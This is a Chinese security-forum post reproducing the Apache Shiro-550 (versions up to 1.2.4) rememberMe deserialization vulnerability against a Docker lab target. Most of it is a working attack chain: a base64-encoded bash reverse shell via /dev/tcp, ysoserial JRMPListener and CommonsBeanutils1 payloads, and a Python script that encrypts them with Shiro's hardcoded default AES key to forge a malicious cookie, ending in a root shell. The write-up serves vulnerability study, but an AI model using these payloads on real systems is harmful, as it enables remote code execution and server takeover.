安全矩阵

 找回密码
 立即注册
搜索
查看: 2478|回复: 0

Apache Shiro反序列化漏洞-Shiro-550复现总结

[复制链接]

855

主题

862

帖子

2940

积分

金牌会员

Rank: 6Rank: 6

积分
2940
发表于 2021-10-11 20:37:41 | 显示全部楼层 |阅读模式
原文链接:Apache Shiro反序列化漏洞-Shiro-550复现总结

最近一直在整理笔记,恰好碰到实习时遇到的Shiro反序列化漏洞,本着温故而知新的思想,就照着前辈们的文章好好研究了下,整理整理笔记并发个文章。新人初次投稿,文章有啥问题的话,还望各位大佬多多包含。
1、Apache Shiro介绍
Apache Shiro是一个强大且易用的Java安全框架,执行身份验证、授权、密码和会话管理。使用Shiro易于理解的API,开发者可以快速、轻松地获得任何应用程序,从最小的移动应用程序到最大的网络和企业应用程序。

2、Shiro rememberMe反序列化漏洞(Shiro-550)2.1 受影响版本Apache Shiro <=1.2.4
2.2 特征判断返回包中含有rememberMe=deleteMe字段
2.3 漏洞原理在Shiro <= 1.2.4中,反序列化过程中所用到的AES加密的key是硬编码在源码中,当用户勾选RememberMe并登录成功,Shiro会将用户的cookie值序列化,AES加密,接着base64编码后存储在cookie的rememberMe字段中,服务端收到登录请求后,会对rememberMe的cookie值进行base64解码,接着进行AES解密,然后反序列化。由于AES加密是对称式加密(key既能加密数据也能解密数据),所以当攻击者知道了AES key后,就能够构造恶意的rememberMe cookie值从而触发反序列化漏洞。
3、漏洞复现3.1 环境搭建
  1. //获取docker镜像
  2. docker pull medicean/vulapps:s_shiro_1
  3. //启动容器
  4. docker run -d -p 8080:8080 medicean/vulapps:s_shiro_1
复制代码


3.2 工具准备3.2.1 配置maven
1、下载maven
http://maven.apache.org/download.cgi
2、配置win10 maven环境变量以及idea maven环境
https://zhuanlan.zhihu.com/p/48831465
3.2.2 下载ysoserial工具并打包
下载地址:
https://github.com/frohoff/ysoserial
打包完的ysoserial在ysoserial/target文件中
  1. git clone https://github.com/frohoff/ysoserial.git
  2. cd ysoserial
  3. mvn package -D skipTests
复制代码


​PS:终于打包完了,没想到Maven源换成了阿里云的速度还是有点慢。
3.3 漏洞检测这里使用shiro_tool.jar工具检测Shiro是否存在默认的key,

java -jar shiro_tool.jar http://192.168.31.81:8080/
3.4 漏洞利用3.4.1 方式一:nc反弹shell1、制作反弹shell代码
首先,在kali中通过nc监听本地端口,
nc -lvp 4444
接着利用Java Runtime配合bash编码,

bash -i >& /dev/tcp/192.168.31.81/4444 0>&1
结果:

bash -c {echo\,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjMxLjgxLzQ0NDQgMD4mMQ==}|{base64\,-d}|{bash\,-i}
2、通过ysoserial工具中的JRMP监听模块,监听6666端口并执行反弹shell命令:

java -cp ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.JRMPListener 6666 CommonsCollections4 ‘bash -c {echo\,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjMxLjgxLzQ0NDQgMD4mMQ==}|{base64\,-d}|{bash\,-i}‘
3、利用检测出的AES密钥,生成payload
  1. import sys
  2. import uuid
  3. import base64
  4. import subprocess
  5. from Crypto.Cipher import AES
  6. def encode_rememberme(command):
  7. popen = subprocess.Popen([‘java’, ‘-jar’, ‘ysoserial-0.0.6-SNAPSHOT-all.jar’, ‘JRMPClient’, command], stdout=subprocess.PIPE)
  8. BS = AES.block_size
  9. pad = lambda s: s + ((BS - len(s) % BS) * chr(BS - len(s) % BS)).encode()
  10. key = base64.b64decode(“kPH+bIxk5D2deZiIxcaaaA==”)
  11. iv = uuid.uuid4().bytes
  12. encryptor = AES.new(key, AES.MODE_CBC, iv)
  13. file_body = pad(popen.stdout.read())
  14. base64_ciphertext = base64.b64encode(iv + encryptor.encrypt(file_body))
  15. return base64_ciphertext
  16. if __name__ == ‘__main__‘:
  17. payload = encode_rememberme(sys.argv[1])
  18. print “rememberMe={0}”.format(payload.decode())
复制代码

Python2用pip安装Crypto的过程中,出现了各种问题,最主要的问题就是各种报缺少Crypto.Cipher模块的错误,Google百度网上找了一大堆,疯狂pip安装卸载,都无法解决,后来索性采取了手动安装Crypto模块,最后终于解决。问题一:

ImportError: No module named Crypto.Cipher
——>手动下载Crypto包进行安装
下载地址:https://pypi.org/simple/pycrypto/
问题二:

error: command ‘x86_64-linux-gnu-gcc‘ failed with exit status 1
——>安装依赖库解决:

apt-get install build-essential python-dev libssl-dev libffi-dev libxml2 libxml2-dev libxslt1-dev zlib1g-dev
使用test_shiro550.py,生成payload

python test_shiro550.py 192.168.31.81:6666

4、利用生成的rememberMe值构造数据包,伪造cookie,发送请求。

5、查看nc监听结果,反弹shell成功。

nc成功反弹shell,whoami命令查询为root权限。
3.4.2 方式二:命令执行1、使用ysoserial工具生成poc

java -jar ysoserial-0.0.6-SNAPSHOT-all.jar CommonsBeanutils1 “echo ‘test shiro-550’ > /tmp/SUCCESS“ > poc
2、使用Shiro默认AES Key对payload进行加密

3、brupsuite抓包,发送带有伪造的rememberMe Cookie的请求。

4、查看目标服务器的/tmp目录,确认生成了SUCCESS文件。

5、总结Shiro-550漏洞产生的根本原因就是因为AES加密的key硬编码在源码中,从而可以被攻击者利用泄露的AES key伪造rememberMe字段生成cookie值,导致反序列化漏洞。因此,服务器端对cookie值的处理过程反过来就是payload的产生过程:命令=>进行序列化=>AES加密=>base64编码=>产生RememberMe Cookie值。


回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2025-4-22 16:24 , Processed in 0.015403 second(s), 18 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表